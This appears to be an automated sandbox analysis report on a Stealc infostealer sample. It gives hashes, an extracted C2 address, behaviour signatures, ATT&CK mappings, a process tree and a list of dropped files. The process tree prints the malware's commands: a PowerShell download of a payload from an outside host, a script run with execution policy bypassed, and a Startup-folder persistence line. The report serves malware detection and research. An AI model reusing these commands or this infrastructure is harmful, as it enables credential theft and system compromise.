stealc | b5eaf10fcee125295402478e086f6e3c441024daec47dde0170ba528525f1eb2

Analysis

max time kernel
147s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
11-10-2024 20:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6706ad721d914_JuidePorison.exe
Size

8.6MB
MD5

54e6bcf9be550a5b8e5cd7b83318942d
SHA1

0c9084c04d5dd833867a60376c0809e8276fd869
SHA256

b5eaf10fcee125295402478e086f6e3c441024daec47dde0170ba528525f1eb2
SHA512

afed87e898d00a146c42f4c81b86fe5c243c205fabb3296d757915bc427bfa8fe91d7cad48a4d36f427168b90011d8ce05e8b3003ccf47f0a3e3ab5151eefd1f
SSDEEP

196608:CkQm7e7eIqv9n2vYLIRQ6SSQCpX67SfUDTsmpfCcXe+8BvSk:CkQm7e7eIqvF2vRCApXVwTsmpfCcL8g

Score

10^/10

stealc default7_doz discovery execution spyware stealer

Malware Config

Extracted

Family

stealc

Botnet

default7_doz

http://62.204.41.176

Attributes

url_path
/edd20096ecef326d.php

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://my.cloudme.com/v1/ws2/:usefullbox/:real/real.txt

Signatures

Stealc
Stealc is an infostealer written in C++.
stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 4156 created 3392	4156	Guard.exe	52
PID 4156 created 3392	4156	Guard.exe	52

Blocklisted process makes network request 2 IoCs

flow	pid	Process
16	3536	powershell.exe
18	3580	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3536	powershell.exe
3580	powershell.exe

Downloads MZ/PE file

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url	cmd.exe

Executes dropped EXE 6 IoCs

pid	Process
4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe
4680	zTCWxlDOTGzPhQpeuwN92IH6.exe
1120	wKCThZUNk8kInBMiQ57eL4gG.exe
3316	zTCWxlDOTGzPhQpeuwN92IH6.exe
4156	Guard.exe
560	jsc.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral4/files/0x001b00000002abb8-21.dat	autoit_exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4680 set thread context of 3316	4680	zTCWxlDOTGzPhQpeuwN92IH6.exe	82
PID 560 set thread context of 2736	560	jsc.exe	92

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4500	4680	WerFault.exe	78

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Guard.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jsc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6706ad721d914_JuidePorison.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zTCWxlDOTGzPhQpeuwN92IH6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zTCWxlDOTGzPhQpeuwN92IH6.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
4932	6706ad721d914_JuidePorison.exe
4932	6706ad721d914_JuidePorison.exe
3536	powershell.exe
3536	powershell.exe
3580	powershell.exe
3580	powershell.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe
2736	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	3536	powershell.exe
Token: SeDebugPrivilege	3580	powershell.exe
Token: SeBackupPrivilege	2736	RegAsm.exe
Token: SeSecurityPrivilege	2736	RegAsm.exe
Token: SeSecurityPrivilege	2736	RegAsm.exe
Token: SeSecurityPrivilege	2736	RegAsm.exe
Token: SeSecurityPrivilege	2736	RegAsm.exe
Token: SeDebugPrivilege	2736	RegAsm.exe

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe
4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe
4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe
4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe
4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe

Suspicious use of SendNotifyMessage 8 IoCs

pid	Process
4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe
4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe
4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe
4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe
4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe
4156	Guard.exe
4156	Guard.exe
4156	Guard.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 4932 wrote to memory of 4004	4932	6706ad721d914_JuidePorison.exe	77
PID 4932 wrote to memory of 4004	4932	6706ad721d914_JuidePorison.exe	77
PID 4932 wrote to memory of 4680	4932	6706ad721d914_JuidePorison.exe	78
PID 4932 wrote to memory of 4680	4932	6706ad721d914_JuidePorison.exe	78
PID 4932 wrote to memory of 4680	4932	6706ad721d914_JuidePorison.exe	78
PID 4004 wrote to memory of 3536	4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe	80
PID 4004 wrote to memory of 3536	4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe	80
PID 4680 wrote to memory of 3316	4680	zTCWxlDOTGzPhQpeuwN92IH6.exe	82
PID 4680 wrote to memory of 3316	4680	zTCWxlDOTGzPhQpeuwN92IH6.exe	82
PID 4680 wrote to memory of 3316	4680	zTCWxlDOTGzPhQpeuwN92IH6.exe	82
PID 4680 wrote to memory of 3316	4680	zTCWxlDOTGzPhQpeuwN92IH6.exe	82
PID 4680 wrote to memory of 3316	4680	zTCWxlDOTGzPhQpeuwN92IH6.exe	82
PID 4680 wrote to memory of 3316	4680	zTCWxlDOTGzPhQpeuwN92IH6.exe	82
PID 4680 wrote to memory of 3316	4680	zTCWxlDOTGzPhQpeuwN92IH6.exe	82
PID 4680 wrote to memory of 3316	4680	zTCWxlDOTGzPhQpeuwN92IH6.exe	82
PID 4680 wrote to memory of 3316	4680	zTCWxlDOTGzPhQpeuwN92IH6.exe	82
PID 4004 wrote to memory of 3580	4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe	84
PID 4004 wrote to memory of 3580	4004	ojjer8fyx2Yh5wFnLZG6cJAN.exe	84
PID 3580 wrote to memory of 4156	3580	powershell.exe	88
PID 3580 wrote to memory of 4156	3580	powershell.exe	88
PID 3580 wrote to memory of 4156	3580	powershell.exe	88
PID 4156 wrote to memory of 1852	4156	Guard.exe	89
PID 4156 wrote to memory of 1852	4156	Guard.exe	89
PID 4156 wrote to memory of 1852	4156	Guard.exe	89
PID 4156 wrote to memory of 560	4156	Guard.exe	91
PID 4156 wrote to memory of 560	4156	Guard.exe	91
PID 4156 wrote to memory of 560	4156	Guard.exe	91
PID 4156 wrote to memory of 560	4156	Guard.exe	91
PID 4156 wrote to memory of 560	4156	Guard.exe	91
PID 560 wrote to memory of 2736	560	jsc.exe	92
PID 560 wrote to memory of 2736	560	jsc.exe	92
PID 560 wrote to memory of 2736	560	jsc.exe	92
PID 560 wrote to memory of 2736	560	jsc.exe	92
PID 560 wrote to memory of 2736	560	jsc.exe	92
PID 560 wrote to memory of 2736	560	jsc.exe	92
PID 560 wrote to memory of 2736	560	jsc.exe	92
PID 560 wrote to memory of 2736	560	jsc.exe	92

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3392
- C:\Users\Admin\AppData\Local\Temp\6706ad721d914_JuidePorison.exe
  "C:\Users\Admin\AppData\Local\Temp\6706ad721d914_JuidePorison.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4932
- - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\ojjer8fyx2Yh5wFnLZG6cJAN.exe
    C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\ojjer8fyx2Yh5wFnLZG6cJAN.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:4004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:usefullbox/:real_1/real" -OutFile "C:\Users\Public\Guard.exe""
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3536
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3580
    - - C:\Users\Public\Guard.exe
        
        "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:4156
- - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\zTCWxlDOTGzPhQpeuwN92IH6.exe
    C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\zTCWxlDOTGzPhQpeuwN92IH6.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4680
  - - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\zTCWxlDOTGzPhQpeuwN92IH6.exe
      "C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\zTCWxlDOTGzPhQpeuwN92IH6.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3316
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 268
      4⤵
      Program crash
      PID:4500
- - C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\wKCThZUNk8kInBMiQ57eL4gG.exe
    C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\wKCThZUNk8kInBMiQ57eL4gG.exe
    3⤵
    - Executes dropped EXE
    PID:1120
- C:\Windows\SysWOW64\cmd.exe
  cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
  2⤵
  - Drops startup file
  - System Location Discovery: System Language Discovery
  PID:1852
- C:\Users\Public\jsc.exe
  C:\Users\Public\jsc.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:560
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4680 -ip 4680
1⤵
PID:3148

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
5f4c933102a824f41e258078e34165a7

SHA1
d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee

SHA256
d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2

SHA512
a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e6baeec02c3d93dce26652e7acebc90

SHA1
937a7b4a0d42ea56e21a1a00447d899a2aca3c28

SHA256
137bf90e25dbe4f70e614b7f6e61cba6c904c664858e1fe2bc749490b4a064c0

SHA512
461990704004d7be6f273f1cee94ea73e2d47310bac05483fd98e3c8b678c42e7625d799ac76cf47fe5e300e7d709456e8c18f9854d35deb8721f6802d24bea4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bmfziayv.qtl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\ojjer8fyx2Yh5wFnLZG6cJAN.exe

Filesize
1.1MB

MD5
6c4f3c584265f7c5b346356de3034244

SHA1
4fa91c02229d62e0d0765add00af13ac55fe54c0

SHA256
bfe368b6b3729f8dfee1531e43cd41a787c554e3090645dd66f9785be96ccff4

SHA512
fa19b642cdc4f616e798d61945c16c68c0e378de0e8de701d323727f19e2e3b138c360e91df2da4f19f9ccec90436595038a39c40a7ed4488e066066173782be

Download Submit
C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\wKCThZUNk8kInBMiQ57eL4gG.exe

Filesize
609KB

MD5
13c524a80cfdf59bccb89263e2e9d758

SHA1
e3af9dbc99aa7f61fc59426154dea92979c1a866

SHA256
f06e0e417bca037bfa2150451bb6a4e38aa9db104c29167c1f642dc2ca60abfc

SHA512
fb0b64802e4b358da21c3bf093291841e92405c477c34d30e4e8499ba0689cd660a0ab1786a0739b1aeb00c0c9fb03ea9ec05714bd069d93613f75631c81145f

Download Submit
C:\Users\Admin\AppData\Local\Temp\n02oUeRMHv8UBCEql5Wg\zTCWxlDOTGzPhQpeuwN92IH6.exe

Filesize
533KB

MD5
37375d2bbcce65e3a00f34b015bbb854

SHA1
141b1e199e6851d2ce3e0415c46d0577227c452d

SHA256
0df41caa968a517a454a6f36528c572af685f1ab62f792760e3a4d8e9de40461

SHA512
6732051c39d8ad537f604157cce458b9a5f78ff01fb5d6cbc1a3afa6c205b2485f5088f8febfb418b29d558c799816af73dee84f52dab789808fc6b5ef599915

Download Submit
C:\Users\Public\Guard.exe

Filesize
872KB

MD5
18ce19b57f43ce0a5af149c96aecc685

SHA1
1bd5ca29fc35fc8ac346f23b155337c5b28bbc36

SHA256
d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd

SHA512
a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

Download Submit
C:\Users\Public\PublicProfile.ps1

Filesize
362B

MD5
d7df678ffcfc7d7f4470b544c86c38c1

SHA1
3c84b3fd4b140404dec215c407115c39acac20d7

SHA256
eef80edfd2cb9f9942584d1e6294e4c1225a3c0206fccafc01fd5ababcccbee1

SHA512
771d13b466a68a6dca47cdbabb87ba1c8fd3abec3a866a7e98cfa0b3b174e7967cd5a5fdbbcd01b0d28c875b398f96d252a291c397a6cc32c74390b815020ca1

Download Submit
C:\Users\Public\Secure.au3

Filesize
2.6MB

MD5
f4ca7289e90e47a2fc9f4e0dd9c6058b

SHA1
8e7f1618a672772a7c2b38de8aa7bbc47b6a3b37

SHA256
edbf993b48fa8ce321637fb3ec609a28687de0b56979a90a08cc8ca4f4aa3ac6

SHA512
c1585c60137f89b150b116c80b39ed02402c9511967605789343b28131ecf2db216e4c69ecd851807fd50a77807067629c420fbe0e2e4d1893e4ed742d9630d7

Download Submit
C:\Users\Public\jsc.exe

Filesize
46KB

MD5
1b0e9d39693b026b951bbf2a25ba61a0

SHA1
9cbf99a8dc23be60834609663e7a338fc5d093d6

SHA256
ffec0de61d7accbda9d57ee5b297fcd4725e971a061da41ad0c5751c496ef6a4

SHA512
89c453b4c0e183ec62d32c00617b8056d346225a4b0b38681129be828a34b2f94a20f6344266b6e8f9b2c15d9a244dc9ba049c85d2d126f44984da5caf6b5a09

Download Submit
memory/560-74-0x0000000000980000-0x0000000000A84000-memory.dmp

Filesize
1.0MB

Download
memory/560-77-0x0000000004FD0000-0x000000000506C000-memory.dmp

Filesize
624KB

Download
memory/560-78-0x0000000005380000-0x0000000005456000-memory.dmp

Filesize
856KB

Download
memory/560-79-0x00000000052E0000-0x0000000005302000-memory.dmp

Filesize
136KB

Download
memory/2736-89-0x00000000083A0000-0x00000000083EC000-memory.dmp

Filesize
304KB

Download
memory/2736-80-0x0000000000400000-0x0000000000468000-memory.dmp

Filesize
416KB

Download
memory/2736-85-0x00000000088B0000-0x0000000008EC8000-memory.dmp

Filesize
6.1MB

Download
memory/2736-84-0x0000000005280000-0x000000000528A000-memory.dmp

Filesize
40KB

Download
memory/2736-83-0x00000000052A0000-0x0000000005332000-memory.dmp

Filesize
584KB

Download
memory/2736-82-0x00000000057B0000-0x0000000005D56000-memory.dmp

Filesize
5.6MB

Download
memory/2736-87-0x0000000008430000-0x000000000853A000-memory.dmp

Filesize
1.0MB

Download
memory/2736-86-0x0000000008300000-0x0000000008312000-memory.dmp

Filesize
72KB

Download
memory/2736-94-0x000000000ABF0000-0x000000000B11C000-memory.dmp

Filesize
5.2MB

Download
memory/2736-92-0x0000000009850000-0x000000000986E000-memory.dmp

Filesize
120KB

Download
memory/2736-88-0x0000000008360000-0x000000000839C000-memory.dmp

Filesize
240KB

Download
memory/2736-93-0x000000000A4F0000-0x000000000A6B2000-memory.dmp

Filesize
1.8MB

Download
memory/2736-90-0x0000000009160000-0x00000000091C6000-memory.dmp

Filesize
408KB

Download
memory/2736-91-0x00000000097D0000-0x0000000009846000-memory.dmp

Filesize
472KB

Download
memory/3316-47-0x0000000000400000-0x0000000000661000-memory.dmp

Filesize
2.4MB

Download
memory/3316-49-0x0000000000400000-0x0000000000661000-memory.dmp

Filesize
2.4MB

Download
memory/3536-31-0x00007FFEEBF73000-0x00007FFEEBF75000-memory.dmp

Filesize
8KB

Download
memory/3536-33-0x0000027135870000-0x0000027135892000-memory.dmp

Filesize
136KB

Download
memory/3536-45-0x00007FFEEBF70000-0x00007FFEECA32000-memory.dmp

Filesize
10.8MB

Download
memory/3536-32-0x00007FFEEBF70000-0x00007FFEECA32000-memory.dmp

Filesize
10.8MB

Download
memory/4680-46-0x0000000000CFB000-0x0000000000CFC000-memory.dmp

Filesize
4KB

Download
memory/4932-4-0x0000000003850000-0x0000000003851000-memory.dmp

Filesize
4KB

Download
memory/4932-5-0x0000000003860000-0x0000000003861000-memory.dmp

Filesize
4KB

Download
memory/4932-6-0x0000000003870000-0x0000000003871000-memory.dmp

Filesize
4KB

Download
memory/4932-1-0x00000000020D0000-0x00000000020D1000-memory.dmp

Filesize
4KB

Download
memory/4932-8-0x0000000000960000-0x0000000001946000-memory.dmp

Filesize
15.9MB

Download
memory/4932-28-0x0000000000960000-0x0000000001946000-memory.dmp

Filesize
15.9MB

Download
memory/4932-29-0x0000000000A38000-0x00000000010A2000-memory.dmp

Filesize
6.4MB

Download
memory/4932-0-0x0000000000A38000-0x00000000010A2000-memory.dmp

Filesize
6.4MB

Download
memory/4932-2-0x00000000020E0000-0x00000000020E1000-memory.dmp

Filesize
4KB

Download
memory/4932-13-0x0000000000960000-0x0000000001946000-memory.dmp

Filesize
15.9MB

Download
memory/4932-12-0x0000000000A38000-0x00000000010A2000-memory.dmp

Filesize
6.4MB

Download
memory/4932-7-0x0000000003880000-0x0000000003881000-memory.dmp

Filesize
4KB

Download
memory/4932-3-0x0000000002100000-0x0000000002101000-memory.dmp

Filesize
4KB

Download